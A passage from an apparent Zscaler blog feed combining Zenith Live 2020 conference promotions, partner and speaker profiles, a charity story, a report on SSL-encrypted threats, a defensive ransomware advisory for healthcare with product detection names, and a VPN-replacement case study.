Live session, learn how Silver Peak and Zscaler transformed Cushman & Wakefield’s network and enabled rapid network onboarding of acquired businesses to support its growth strategy. Don’t forget to check out the Silver Peak booth at the Zenith Live Partner Hall during the conference, and don’t miss their session A WAN Transformation Journey: Building an Enterprise-grade SASE with Silver Peak and Zscaler. On December 8-10, 2020, Zenith Live will bring together innovators leading their organizations’ secure digital transformation. This year’s summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek opportunity beyond limits. Register today: Amit Raikar Zenith Live 2020 Session Spotlight: “Securing Your IoT and OT Infrastructure” Operational technology (OT) and the data it generates are critical for enterprises seeking to maintain business continuity, improve efficiency, and accelerate progress. From powering cities, to slicing chocolate bars, to watering a remote orchard, to managing medical procedures, to lighting an assembly-line floor, OT systems deliver vital information to organizational leaders. But they are often vulnerable to a new type of security threat. OT is generating more data. Analysts are developing new ways to interpret it. Leaders are finding new ways to apply those learnings. And hackers are targeting new IoT attack vectors. Unfortunately, the vast majority of OT and IoT devices in the world remain unsecured, presenting significant threat risk to enterprise IT leaders. Combined with that, many organizations have little institutional awareness of all of their IoT/OT devices. (A recent Zscaler ThreatLabZ study notes the extent to which shadow IT initiatives have complicated IoT security.) Protecting valuable OT assets has never been more important. Addressing cybersecurity risk requires collaboration between OT and IT leadership, and goal alignment with business leaders. Protection begins with an enterprise audit of IoT/OT devices, followed by establishing secure, direct connectivity between those IoT/OT devices and data-traffic destinations. Few people recognize the importance of mitigating OT cybersecurity risk more than Anthony Atherton, Head of the Digitalization Enablement Center (DEC) at Siemens IT Strategy. Atherton has worked with Zscaler, his IT team, and business leaders across Siemens to develop and deploy comprehensive cybersecurity solutions for OT protection. The Zscaler Zero Trust Exchange secures more than one billion IoT transactions per month. Want to learn more about how Zscaler works with customers like Siemens to protect IoT/OT systems and data? Join Anthony and me at next month’s Zenith Live 2020, where we’ll co-present on this very topic. Our session “Securing Your IoT and OT Infrastructure” is scheduled for day two of the Americas, International, and Asia-Pacific editions of the premier global cloud event. This year, every seat’s in the front row as Zenith Live goes online and free. But space is limited! Register now. Nathan Howe Don’t Miss VMware at Zenith Live 2020 We’re looking forward to seeing you at Zenith Live 2020 Virtual Cloud Summit on December 8-10. Join fellow IT leaders and pioneers who are driving real secure digital transformation in their organizations and preparing for a mobile, multi-cloud future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.” The partnership between VMWare and Zscaler definitely takes SASE and zero trust beyond limits by helping enterprises to accelerate their SD-WAN transformation while delivering optimal application performance, agility, and security.  VMware is a Zenith Live platinum sponsor and will host a booth at the Partner Hall during the summit. We asked VMware to quickly answer a few questions about its cloud-delivered SD-WAN, Zscaler, and Zenith Live: How does VMware SD-WAN™ help enterprises realize digital transformation goals? As cloud-delivered applications become commonplace and a dispersed workforce becomes the new normal, backhauling traffic over MPLS to a centralized data center via a hub-and-spoke architecture is as inefficient as it is irrelevant. This traditional approach introduces unnecessary complexity and latency that negatively impacts application performance and user experience. With a hyper-scale model of more than 3000 gateways strategically located in 130+ Point of Presence (PoPs) worldwide, VMware SD-WAN enables closest and optimized handoff to application locations deployed in any cloud. How does the partnership between VMware and Zscaler contribute to an enterprise’s digital transformation journey? VMware SD-WAN with Zscaler Cloud Security delivers direct-to-cloud connectivity with secure and optimized local internet breakouts. Zero-touch provisioning enables rapid deployments of SD-WAN and security services. Flexible deployment options simplify branch IT operations while enabling scalability and centralized policy and WAN management. With Zscaler’s cloud-native security services, all users in all locations get identical protection. The seamless integration reduces complexity and aligns business and security policies meeting application needs and business objectives.  What presence will VMware have at the Zenith Live conference? We have a speaking session with our joint customer, NCR Corporation. NCR will share insights on why they chose VMware and Zscaler for a secure cloud-delivered SD-WAN, along with the benefits they have derived from the joint solution. Join IT leaders driving the mobile- and cloud-first future December 8-10 at Zenith Live 2020, the Zscaler Virtual Cloud Summit. Zenith Live 2020 offers insights, strategies, real-world examples, and best practices for accelerating your secure digital transformation. Don’t forget to check out VMware’s booth at the Zenith Live Partner Hall during the conference, and don’t miss their session NCR perspective: Deploying SASE with VMware and Zscaler. This year’s summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek secure digital transformation beyond limits.  Register now: Amit Raikar Confidence and Collaboration Bring IT Career Success This post originally appeared on LinkedIn. Zenith Live 2020 is almost here. This virtual summit will bring together network, cloud, and enterprise secure digital transformation pioneers and experts. On December 8, the event will be completely online, free, and focused on preparing your organization for a mobile- and cloud-first future. I’m particularly excited to announce the Women in Technology fireside chat. Women pioneers have transformed the information technology industry. But though representation has grown—by some estimates to 25%—there’s still far to go. Studies and books like The Confidence Code suggest that individual workplace success is conditioned on risk-taking, commitment, and resolute confidence when confronting opportunity. In this engaging roundtable session, former PepsiCo CIO Jody Davids, Hitachi CIO Jaya Ramaswamy, myself, and other notable IT industry leaders will discuss our experience in the C-suite, practical approaches for breaking down the barriers, and habits for transformative change. We’ll look at: Planning for a career in IT and cybersecurity Real-world strategies for navigating different IT career progression tracks Advocacy and professional development programs supporting women in IT careers Diversity and collaboration as the secret ‘unlock’ for organizational change Developing a support network by getting help and giving it Instilling a growth mindset, developing personal confidence, and achieving work-life integration Part of accelerating change is recognizing and celebrating pioneering female leaders who have transformed our industries for the better. The inclusive enterprise is egalitarian, agile, resilient, and effective. As IT leaders, we—all of us—must work to build environments that foster the success of the many. I am excited to join forces with these amazing leaders to celebrate our successes, acknowledge our challenges, and drive change across our organizations and the industry. Join me at this fireside chat, and join me to support the next generation of IT leaders. Secure your spot Zenith Live 2020 will be unlike any other virtual conference. As the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits. Registration is live, so don’t wait to reserve your spot. See you there! Kavitha Mariappan Up Close and Way Beyond: Captain Scott Kelly Headlines Zenith Live Beyond limits isn’t just the theme of this year’s Zenith Live cloud summit; it’s an homage to the resources we’ve all summoned this year in the face of global, social, professional, and economic challenges—some enormous and distant, some right in front of us every day. From rethinking how we take care of ourselves and others to how we work and learn, each of us has had to dig deep for the reserves we’ve needed. It hasn’t been easy, but we’ve managed to find the tenacity, resiliency, and, at times, scrappiness to reach farther than we thought possible. It’s only fitting that the U.S. Astronaut and former Navy Captain Scott Kelly will be at Zenith Live to share his thoughts on the indomitability of the human spirit, its ability to go beyond limits. I first saw Captain Scott Kelly at, of all places, a rock concert. In 2011, while living on the International Space Station (ISS), Kelly joined me (and 60,000 of my close friends) at a U2 concert. Beamed in live via satellite from space, Captain Kelly spoke to us directly on the big screen. He talked of unity, the notion of a one-world community, and "rising above all the nonsense." The veteran of four space flights and the American record holder for consecutive days spent in space, Captain Kelly has faced tests few people ever will, such as the extreme challenges of long-term spaceflight—its devastating effects on the body, the separation from loved ones, the pressures of close cohabitation, and the catastrophic risks of depressurization or colliding with space junk. In his keynote, Captain Kelly will share his remarkable trajectory from Navy fighter pilot to commander of the ISS. He’ll discuss the importance of leadership, teamwork, and embracing risk as a way to test your limits and achieve your full potential. A natural storyteller and bestselling author of Infinite Wonder, Endurance, and two books for young readers, we’re delighted that Captain Kelly will be at Zenith Live to share his unique insights into the infinite wonder of the galaxy and the strength of the human will. Scott Kelly is just one of the speakers we are thrilled to welcome to Zenith Live. There are many others who have led missions of their own, each with fascinating stories and unique perspectives on what it means to reach beyond limits—personally and professionally. Some of those speakers include: Nicole Darden Ford, VP and CISO, Carrier Mike Towers, CISO, Takeda Pharmaceuticals Company Andy Greenberg, Technology Journalist & Author of ‘Sandworm’ Tony Gazikas, CIO IT Operations, Digital Product Security & Cybersecurity, Stanley Black & Decker, Inc. Rob Franch, CTO, Cushman & Wakefield Hanna Hennig, CIO, Siemens AG John Maya VP, Operational Excellence, Royal Caribbean Group Jody Davids, Former SVP & Global CIO, PepsiCo Jay Chaudhry, CEO, Chairman, and Founder, Zscaler About Zenith Live 2020 Kicking off December 8, this year’s Zenith Live will be completely virtual and focused on preparing your organization for a secure digital future. For anyone driving digital transformation—network architects, security practitioners, CIOs and CISOs, and IT professionals at all levels—Zenith Live is the most important event you can attend this year. It offers informative sessions that can bolster you on your professional journey no matter where that may be. You can learn new skills or advance those you’ve already developed. You can engage with experts in areas of interest to you. You can meet with peers whose journeys are similar to your own. And you can hear from an astronaut who, just like you, knows a thing or two about going beyond limits. Secure your spot today Dan Shelton 2020: The State of Encrypted Attacks This blog is an overview of the latest threat research conducted by ThreatLabZ, Zscaler’s security research team. The full report is available here. While SSL/TLS encryption is the industry standard for protecting data in transit from prying eyes, encryption has, itself, become a threat. It is often leveraged by attackers to sneak malware past security tools that do not fully inspect encrypted traffic. As the percentage of traffic that is encrypted continues to grow, so do the opportunities for attackers to deliver threats through encrypted channels. To better understand the use of encryption and the volume of encrypted traffic that is inspected, our research team, ThreatLabZ, analyzed encrypted traffic across the Zscaler cloud for the first nine months of 2020, assessing its use within specific industries. The study we conducted also set out to analyze the types of attacks that use encryption and the extent of the current risk. Our 2020 report shows that SSL-based threats remain prevalent and are becoming increasingly sophisticated. Our findings, some of which are highlighted below, show that traffic moving through encrypted channels can no longer be trusted simply by virtue of a digital certificate—the padlock icon on your browser does not guarantee security. Attackers are preying on people’s trust of brands like Microsoft, Google, Netflix... Our research showed that attackers have rapidly increased registration of malicious domains, which contributed to the 260 percent increase in SSL-encrypted threats in 2020 when compared to last year. Netflix credential phishing site over HTTPS Cybercriminals use “domain squatting” and “homograph attacks” to imitate popular, legitimate web pages with pixel-perfect replicas. Their ultimate goal is obvious: prey on the trust of big brands to deliver malware and steal login credentials (such as banking information) and other sensitive personal information. For example, links to registered domains along the lines of and could be clicked on by someone not paying close attention and these sites can look nearly indistinguishable from the legitimate ones. And, as these domains leverage SSL/TLS encryption by default, they could easily bypass traditional security controls. They abuse AWS, Google Drive, OneDrive, and Dropbox to deliver encrypted threats Cloud-based file-sharing services are powerful tools for boosting employees’ collaboration and productivity. These services securely share files and information, with the SSL-encrypted content generally bypassing security controls. While good for performance, bypassing security can open a backdoor into many enterprises. By the end of the analysis period, we found that malicious content delivered with encryption from file-sharing services represented 30 percent of all malicious SSL traffic. Advanced threats blocked over TLS/SSL from top cloud storage services Attacks can be initiated by creating file-sharing URLs to malicious content hosted in services like Google Drive or Dropbox as part of an email phishing campaign. This approach removes the need to attach infected files to emails, which users have been trained to treat with suspicion. Because the content is hosted on a legitimate file-sharing site, it comes with a level of trust—and infected users can quickly spread the attack by sharing the link across the organization. Encrypted ransomware attacks continue to rise Ransomware, malware that encrypts a host’s device or an organization’s data or network in exchange for a ransom payment, remains a significant threat. After successfully stealing and encrypting an organization’s data, today’s attackers may threaten to leak the data if no payment is made. Ransomware attacks delivered over SSL-encrypted channels is the next evolution of this highly destructive attack vector because it makes the attacks harder to detect. We saw a 500 percent increase in ransomware over encrypted channels between March and September 2020. Telecom companies and healthcare institutions have been hit the hardest because they tend to pay the ransoms due to the sensitive nature of their data. Ransomware families including FileCrypt/FileCoder variants, Sodinokibi, Maze, and Ryuk have been the most prevalent in our research. Healthcare organizations bear the brunt of SSL-based attacks Cybercriminals, showing no limits to their depravity, have increased their attacks on the healthcare sector during the pandemic using advanced threats over encrypted channels. Our research found that healthcare was targeted by 25.5 percent of SSL-encrypted threats. While costly, threats hidden in encryption can have even more dire consequences, particularly when they affect the delivery of healthcare. Advanced threats blocked over encrypted channels by industry Protecting your organization against SSL threats It’s important to recognize that SSL traffic is not necessarily secure traffic. Just as the use of encryption has increased, so has its use among adversaries to hide their attacks. The need to inspect encrypted traffic is greater than ever. Decrypt, detect, and prevent threats in all SSL traffic with a proxy-based architecture and cloud-native performance. Quarantine unknown attacks and stop patient-zero malware with AI-driven quarantine that holds suspicious content for analysis, unlike firewall-based passthrough approaches. Provide consistent security for all users and all locations to ensure everyone has the same great security all the time, whether they are at home, at headquarters, or on the go. Instantly reduce your attack surface by starting from a position of zero trust, where lateral movement can’t exist. Apps are invisible to attackers, and authorized users directly access needed resources, not the entire network. To learn more about the evolving SSL threat landscape and what your organization can do to inspect all traffic and stay protected, download and review the full ThreatLabZ report. Deepen Desai Helping Changes You: Zscaler Employee Raises Funds for an Orphanage in Burkina Faso Zscaler strongly believes in being a leader when it comes to giving back and helping others. And one of the great things about working at Zscaler is that it is filled with people who feel the same way and go out of their way to exhibit this philosophy. At the beginning of this year, Kadir Erol joined Zscaler as EMEA Director of Channel and Alliances, taking on the responsibility for expanding sales partnerships. His new partner program promotes collaboration with VAR partners, enabling the company to support its customers through their secure digital transformation and to provide holistic advice on all aspects of the process. And that’s just his day job. When he’s not at work, Kadir dedicates his time and skills to Hummaid, an organization that he co-founded to support social aid projects. Kadir’s personal mission—at work and for the charity—is to work with others to achieve great things, and this is reflected in his latest achievement. During a 200-hour, eight-day fundraising marathon, Kadir appealed to Zscaler employees around the world to raise money to build an orphanage in Burkina Faso. If that wasn’t enough, he (quite easily) convinced Zscaler to match every euro donated during this marathon. All of this was in an effort to raise 200,000 euros of initial capital needed for the orphanage project. In a little more than one week of fundraising, Hummaid made huge progress toward its goal. In July 2020, Zscaler employees donated 75,000 euros via the fundraising platform GoFundMe. After the corporate match, the total raised by the Zscaler family reached 150,000 euros. This GoFundMe campaign is ongoing, and private donations are continuing to come in, with the total now at 196,000 euros. Kadir’s interest in social engagement and charitable activities was set in motion by his university friend Ali Altunay. In early 2018, Ali encouraged Kadir to donate money to help build a well in a village of 6,000 inhabitants in one of the most impoverished regions of Africa. Together they raised the money for this first project. After a while, something surprising happened. Kadir received an invitation to the official inauguration ceremony for the new well. This unexpected trip—and the insights it provided into life in Burkina Faso—had a lasting impact on Kadir. His feelings of gratitude that he was born in a more affluent part of the world began to manifest as a desire to help others. Together with Ali, he founded Hummaid as an independent platform for further global projects aimed at providing support to those who need it most. The name of the organization comes from the words human, umma (a community of all people), and aid. Transparency is key to the way this registered charity works. The organization wants its donors or sponsors to see where their money is being spent. When donations are handed to recipients, such as 400 pairs of shoes for children in the Atlas Mountains or food packages for widows, the organization takes photos to share with the donors. After Kadir and Ali visited an orphanage on their first trip to Burkina Faso, they quickly began to lay plans for their next major project. Shocked by the conditions in the region, the pair wanted to build their own orphanage. Architectural plans for the building, developed by Ali, came together quickly, and the organization obtained a plot of land via a local coordinator. Local builders submitted tenders for the construction of a property with living space and communal areas for 120 children, their caretakers, and teachers. The figures gave the pair an idea as to the amount they would need to raise. This month, Kadir and his colleagues will once again make the journey to Burkina Faso to watch the official groundbreaking ceremony for the orphanage in person. “We were amazed at how willing employees were to respond to our appeal for donations,” said Kadir. “It doesn’t matter to us how much any individual donated; we are so thankful for every cent that brought us closer to making this project happen. For me, after my first trip to Africa, I knew that helping changes you.” Kristi Myllenbeck Zenith Live 2020 Speaker Profile: Markus Sontheimer, CIO/CDO, DB Schenker AG Markus Sontheimer will speak on the main stage December 9 at the Zscaler annual cloud summit Zenith Live 2020. Early investment in cloud transformation has paid (metaphorical) dividends for DB Schenker CIO/CDO Markus Sontheimer. But like many of his IT peers, he never expected to have to roll out cloud services so fast. Sontheimer and his IT team manage systems and solutions infrastructure for the Essen, Germany-based global logistics company's 76,000 employees. Sontheimer describes the critical nature of DB Schenker's worldwide operations: "We have to cross borders. We have to ship from A to B, no matter what country it is, and no matter what it costs.” Committing to the cloud DB Schenker had begun its secure digital transformation in 2017, adopting Zscaler Internet Access as part of a broader shift to cloud-based solutions and SaaS. And then the pandemic struck, forcing Sontheimer to lead the most agile IT pivot in company history. Employees—all employees—would have to work remotely. Sontheimer and DB Schenker SVP of Global Infrastructure Services Gerold Nagel recognized immediately that corporate VPN technology couldn't scale to accommodate the added data volumes generated by an entirely remote workforce. "The disruption led us right away to ZPA [Zscaler Private Access]," notes Nagel. Sontheimer and Nagel quickly deployed ZPA, first moving more than 8,000 employees in China to remote access. The encouraging success of that rapid transition led Sontheimer and Nagel to accelerate ZPA rollout to the rest of the company and preserve business continuity. Hear the rest of the story directly from DB Schenker CIO/CDO Markus Sontheimer when he speaks on the main stage at Zenith Live 2020. This year, the world’s premier cloud summit goes virtual and free December 8-10. You’ll get the opportunity to engage with Markus Sontheimer and IT leaders from Unilever, Sandvik, Siemens, Testco, and many more. DB Schenker’s secure digital transformation journey is chronicled in the book Securing Remote Work - Safeguarding Business Continuity with Zscaler, from which a portion of this article is excerpted. Toph Whitmore is a transformation analyst at Zscaler Toph Whitmore Microsoft and Zscaler Bring Zero Trust to Zenith Live The Zenith Live Virtual Cloud Summit 2020 brings together the best experts and brightest minds in security, cloud, and enterprise secure digital transformation. Kicking off December 8, this year’s event is completely virtual, free, and focused on preparing your organization for a mobile, cloud-first future. Zenith Live showcases Zscaler partnerships with other digital transformation leaders. One such leader is Microsoft, a Zscaler partner that works to bring better identity, visibility, and application performance to enterprise security strategies. Both companies leverage each other’s technologies to help enterprises better prepare for the cloud- and mobile-first world: Zscaler and Azure Active Directory (Azure AD). Identity is essential to enterprise security. Zscaler and Azure AD integrate (using SAML, SSO, and SCIM 2.0) to provide secure and seamless access to all your applications. Microsoft provides identity management and, together with Zscaler, provides access controls via policy management. Secure access to legacy applications with a Zero Trust approach is the greatest benefit from the partnership—a crucial advantage for large enterprises that often have hundreds (sometimes thousands) of critical legacy applications. Zscaler and Azure Sentinel. A Zscaler connector in the Azure Sentinel console allows companies to connect ZIA logs with Azure Sentinel and view dashboards, create custom alerts, and improve investigation. By ingesting hundreds of millions (or billions) of internet transactions and threat logs, Azure Sentinel can draw significantly more powerful correlations and machine learning analyses from traffic generated by employees at large organizations. Zscaler and Microsoft 365. Many enterprise customers backhaul traffic to a few internet breakouts for security inspection using a hub-and-spoke network architecture. Zscaler’s ZIA enables local breakouts at virtually every branch office, which directly improves Microsoft 365 application performance. Zscaler’s ZIA is a qualified Microsoft 365 Networking Partner Program solution. Zscaler and Azure Information Protection (AIP). The integration of Zscaler DLP and AIP allows Zscaler to enforce actions based on document classifiers and labels defined by AIP. Zscaler's built-in file decoding capability detects AIP's labels, then takes appropriate actions based on Zscaler's DLP policy. This even works for encrypted files. Sessions at Zenith Live 2020 will demonstrate how Zscaler and Microsoft work together to move enterprises through their transformation journey: Keynote session with Alex Simons, Corporate Vice President of Program Management on Zero Trust and enterprise security. “A Zero Trust approach is the only way to secure your entire digital state” is the message from Alex Simons in his Zenith Live keynote. Listen to Alex discuss how the partnership between Microsoft and Zscaler helps establish user identity and secure corporate assets so that enterprises can rapidly and agilely adapt to changing needs (like the recent work-from-home initiatives many organizations are adopting). Microsoft and Zscaler – How the Enterprise Deploys Work-from-Anywhere in the New Normal. Six months ago, the global pandemic left IT teams scrambling to support millions of employees suddenly working from home. Yet, many teams still rely on the same legacy technologies of the past and struggle to scale and deliver a fast user experience. Their VPN appliances slow them down and are exploited due to outdated security postures. Join us to learn how Sanofi, in its pursuit of a zero trust model, future-ready cloud solution, leveraged Microsoft Azure Active Directory and Zscaler Private Access. As a result, the company was prepared to enable work-from-anywhere securely when the COVID-19 lockdown was implemented across much of the world. Microsoft and Zscaler – Microsoft 365 Best Practices. The Zscaler Zero Trust Exchange works seamlessly with Microsoft 365, providing traffic identification, local network egress, and direct routing, features that serve to optimize Microsoft 365 performance for enterprise users. In this session, Zscaler senior program manager Paul Collinge and director of product management Naresh Kumar join Coca-Cola Consolidated director of the infrastructure center of service Rory Regan to share best practices, lessons learned, and practical real-world advice for deploying Microsoft 365. Secure your spot Zenith Live 2020 will be unlike any other virtual conference. As the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits. Registration is live, so don’t wait to reserve your spot. See you there! Luis Mendoza is senior direct of business development at Zscaler Luis Mendoza Zenith Live Will Accelerate Your Digital Transformation Journey Zenith Live 2020, the Zscaler Annual Cloud Summit will bring together the best experts and brightest minds in security, cloud, and enterprise digital transformation. Kicking off December 8, this year’s event will be completely virtual, free, and focused on preparing your organization for a mobile, cloud-first future. For security and network professionals, IT leaders, and those driving digital transformation initiatives, Zenith Live is the most important event you can attend this year. It offers you a unique opportunity to interact with industry experts and find out how they: Replaced legacy architectures and created agile networks. Used IT to enable business growth beyond the limits of legacy thinking. Led their organizations’ secure digital transformation. Zenith Live boasts hands-on architecture workshops, ask-the-expert sessions, and comprehensive training that can help you realize your vision, empower your organization, and accelerate your digital future with sessions, including: Voice of the Customer Keynotes. Listen to innovation leaders from companies like Johnson Controls, Cushman & Wakefield, and Takeda Pharmaceuticals discuss their success in transforming their organizations for a more agile and secure digital future. Architecture Workshops. Zscaler expert architects share their experience leading network, security, and data center application transformations while reinventing safe connections in the cloud- and mobile-first era. Ask-the-Expert Sessions. Zscaler experts lead interactive sessions on how SASE and zero trust architectures can accelerate your secure digital transformation, with practical steps and proven best practices for successful outcomes. CXO Perspectives Panels. Hear how CIO, CTO, and CISO pioneers from Fortune 500 companies successfully enacted secure digital transformation, overcoming cultural and technological issues. Training tracks. Zenith Live includes training tracks that will make you an expert at deploying zero trust and SASE to solve your business challenges. Network Transformation Essentials and Masters training. Learn cloud firewall configuration, Zscaler Client Connector deployment, SD-WAN implementation, Zscaler Digital Experience user experience visualization, and more. Security Transformation Essentials and Masters training. Find out how to better use cloud-sandboxing, data loss prevention (DLP), endpoint protection, and cloud access security broker (CASB) to improve your enterprise security posture. ZPA Essentials and Masters training. Discover how to get Zscaler Private Access (ZPA) up and running, configure advanced policy controls, manage application discovery, and troubleshoot issues. Secure your spot Zenith Live 2020 will be unlike any other virtual conference. As the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits. Pre-registration is live, so don’t wait to reserve your spot. See you there! David Avery is a transformation strategist at Zscaler. David Avery Zenith Live 2020 Speaker Profile: Andy Greenberg, author of Sandworm Wired Magazine journalist and acclaimed author Andy Greenberg will deliver the day-two keynote at the Zscaler annual cloud summit Zenith Live 2020. "On June 27, 2017, something strange and terrible began to ripple out across the infrastructure of the world." So begins the introduction to Andy Greenberg's book Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers. With more than a little understatement, Greenberg introduces us to NotPetya, the destructive, self-spreading malware that would soon make its presence known (very well-known) across the globe. In Sandworm, Greenberg deconstructs the NotPetya attack, detailing how it struck high-profile companies in pharmaceuticals, shipping, logistics, healthcare, and so many other industries. NotPetya represented a new type of malware, a ransomware variant that purported to take its data hostage, but instead — once released inside a breached network — splintered to move freely “east/west,” eradicating any data on any system accessible from within the victim organization’s security perimeter. In the 2017 round of attacks, NotPetya ultimately caused its corporate victims a whopping USD$10 billion in damages. NotPetya was the work of a Russian state-sponsored cybercriminal organization dubbed “Sandworm.” The devastating NotPetya attacks followed on the heels of the group’s prior criminal activities, including a catastrophic assault on Ukraine's power infrastructure, and a near-successful attempt to sabotage the 2018 Winter Olympics. Investigative journalist Andy Greenberg documented the Sandworm story for Wired Magazine, and has expanded his research into Sandworm’s provenance, approach, and activities for his new book. It’s easy to characterize the 2017 NotPetya deployment as the most devastating malware attack in history. But it was much more than that: It was a novel criminal act, a new malware variant dispassionately pursuing utter annihilation, and the achievement of a new standard in the exercise of punitive force by a state-sponsored international cyber-terrorist group. Despite the sweeping destruction of NotPetya, despite the massive financial impact, despite the immeasurable loss of unrecoverable digital assets, the 2017 NotPetya assault was ultimately thwarted by the tireless work of enterprise IT leaders, many of whom went to extreme lengths to block and respond to the attack. In their exemplary efforts lies a powerful story of preparedness, recovery, and resilience. And a compelling, constructive, even optimistic message: Ransomware doesn’t have to be an inevitability. Hear more of the Sandworm story directly from Andy Greenberg when he speaks on the main stage on day two of Zenith Live 2020. This year, the world’s premier cloud summit goes virtual and free December 8-10. You’ll get the opportunity to engage with industry experts like Andy, cloud-security experts, and IT leaders like yourself pursuing secure digital transformation. Register now at Toph Whitmore Coverage Advisory for Ransomware Activity Targeting Healthcare and Public Health Sector Background A joint cybersecurity advisory was released by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) related to an increased cybercrime threat to U.S. hospitals and healthcare providers from ransomware, notably Ryuk and Conti What is the issue? CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers from ransomware like Ryuk and Conti. These ransomwares have been deployed by malware belonging to Trickbot and BazarLoader/BazarBackdoor families. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the C2 server and install it on the victim’s machine. TrickBot or BazarLoader infection can lead to deployment of ransomware, such as Ryuk and Conti. What systems are impacted? All machines running Windows operating system. What can you do to protect yourself? We recommend making periodic backups of all the important data and keeping those backups isolated off the network. It is equally important to have updated security software and the latest software patches applied to the endpoints. Remote Desktop service access should always be restricted, or it should be turned off if not used. As always, avoid opening suspicious emails containing attachments or links that come from any unknown sources. Disable macros in Office programs. Do not enable them unless it is essential to do so. Enable multi-factor authentication (MFA) across both business and personal email accounts to thwart most credential harvesting attacks. Zscaler coverage Advanced Threat Protection Win32.Downloader.BazarLoader Win64.Downloader.BazarLoader Win32.Backdoor.Bazar Win64.Backdoor.Bazar Win32.Backdoor.Anchorbot Win32.Banker.TrickBot Win64.Banker.TrickBot Win64.Ransom.Ryuk Win32.Ransom.Ryuk Win32.Ransom.Conti Malware Protection W64/Ransom.Ryuk.A.gen!Eldorado W32/Trojan.BVXG-5604 W32/Trojan.XFWW-7740 W64/Agent.BYF.gen!Eldorado W32/Trojan.MLJJ-9184 W32/Trojan.DYOA-8084 W64/Trojan.QDKO-4869 Advanced Cloud Sandbox Win32.Ransom.Ryuk Win32.Ransom.Conti Win32.Banker.Trickbot Details related to these threat signatures can be found in the Zscaler Threat Library. Zscaler had also published detailed analysis blogs for Ryuk, Trickbot and Bazarloader. Our Cloud Sandbox Report for Ryuk ransomware executable can be seen in Figure 1. Fig 1: Cloud Sandbox Report for Ryuk Ransomware Our Cloud Sandbox Report for the Conti ransomware executable can be seen in Figure 2. Fig 2: Cloud Sandbox Report for Conti Ransomware The Zscaler Cloud Sandbox provides proactive coverage against advanced threats such as ransomware and banker trojans. The Zscaler ThreatLabZ team is also actively monitoring Trickbot, BazarLoader, Ryuk and Conti malware families and ensuring coverage for all the latest IOCs associated with these malware. References Jithin Nair Rethinking VPN: ManpowerGroup Modernizes Remote Access in Just 18 Days “Within 18 days we were able to scale up and support more than 90 percent of our users in order to support activities, keep productivity high, and keep businesses running with the resources supplied through ZPA. This identifies efficiencies not only in our internal processes but also in the tools we utilize. That is definitely the partnership and relationship Zscaler provided for us.” – Randy Herold, CISO & CPO, ManpowerGroup (hear the full story in a new webinar with ManpowerGroup) Organizations have had to quickly adapt in response to the COVID-19 pandemic. Helping employees maintain productivity remotely can be challenging, from setting up remote office space and providing device choices (managed or BYOD) to allowing flexible schedules and providing secure access to data and applications. Traditionally, IT teams have relied on virtual private networks (VPNs) for remote workers, as a typical pre-pandemic remote workforce consisted of a fraction of all employees who generally were not logging on at the same time. In this model, remote devices are placed on the corporate network using a VPN to backhaul traffic from the user’s remote location to an inbound gateway hosted within the company’s data center, where the applications would typically reside. As the pandemic emerged and employees began working at home in vast numbers, IT teams aimed to scale quickly by increasing their VPN seats, significantly increasing their budgets in the process. However, many companies discovered problems with this approach. One problem is from the users’ standpoint: backhauling traffic from remote users to data centers often results in complications (such as dropped connections and repeated logins) and latency, leading users to bypass the VPN thereby defeating the purpose of deploying it in the first place. Another problem is on the IT side: VPN appliances must be managed and patched frequently to prevent them from becoming vulnerable to attack. There have been many recent reports of security holes and bugs detected in VPNs, one of which required more than 800,000 appliances to be updated and patched. VPN appliances are known to increase an organization’s attack surface, and the more you have, the greater the risk. Since the beginning of the pandemic, cyberattacks in general have increased, and so have attacks on VPNs. With so many people seeking information to keep themselves and their families safe, attackers are using this opportunity to plant malware in links and applications and carry out attacks such as Windows server exploits, remote code exploits, social engineering, and ransomware attacks. Workers who are unaccustomed to working remotely, or are not used to VPNs, have fallen prey to VPN exploits. In one instance, Twitter employees were lured into giving out their VPN credentials. This request didn’t seem out of the ordinary for the users, given the issues they’d been having with VPN use. ManpowerGroup took a different approach ManpowerGroup is one of many organizations using the pandemic to look into long-term, pandemic-proof secure solutions. We had the opportunity to chat with Randy Herold, CISO and CPO of ManpowerGroup, to understand the company’s success in providing secure access to employees and quickly adapt to a remote workforce. ManpowerGroup is a world leader in innovative workforce solutions connecting people to meaningful work across a wide range of skills and industries. ManpowerGroup was already on its journey to digital transformation, but Randy and his team found they had to accelerate it to accommodate the “new normal.” Randy explains that what would have taken the company 18 months to deploy was decided on and implemented in 18 days due to the urgent need for employees to work remotely at full capacity. Previously, ManpowerGroup used VPN for remote employees, which comprised only a small portion of the company’s workforce. Varied VPN protocols across the company’s global workforce had to keep up with security patches to prevent cyberattacks. Randy describes implementing those security protections as an “operational nightmare.” Randy and his team were looking for a unified solution that would also improve user experience for more than 30,000 employees worldwide. In its quest for a cloud-driven environment, the company implemented Zscaler Private Access (ZPA) to provide the ability to support multicloud environments with a single ruleset. This decision resulted in flexibility and reassurance that security protections would be in place regardless of the cloud or on-prem solutions employees were accessing. Learn how ManpowerGroup enabled a fully remote workforce with ZPA and the business value that ZPA has brought since implementation. Watch the Webinar featuring Randy Herold, CISO and CPO, ManpowerGroup Kanishka Pandit is a product marketing manager for Zscaler Private Acces Kanishka Pandit Going Beyond: Zenith Live 2020 Zenith Live is bringing together some of the boldest and brightest minds in security, cloud, and beyond. Kicking off December 8, this year’s event will be completely virtual, free, and focused on preparing your organization for a mobile, cloud-first future. As a security and network digital transformation professional, it is the most important event you can attend this year. The theme of Zscaler's third annual cloud summit is “Beyond Limits” and will feature inspiring speakers, 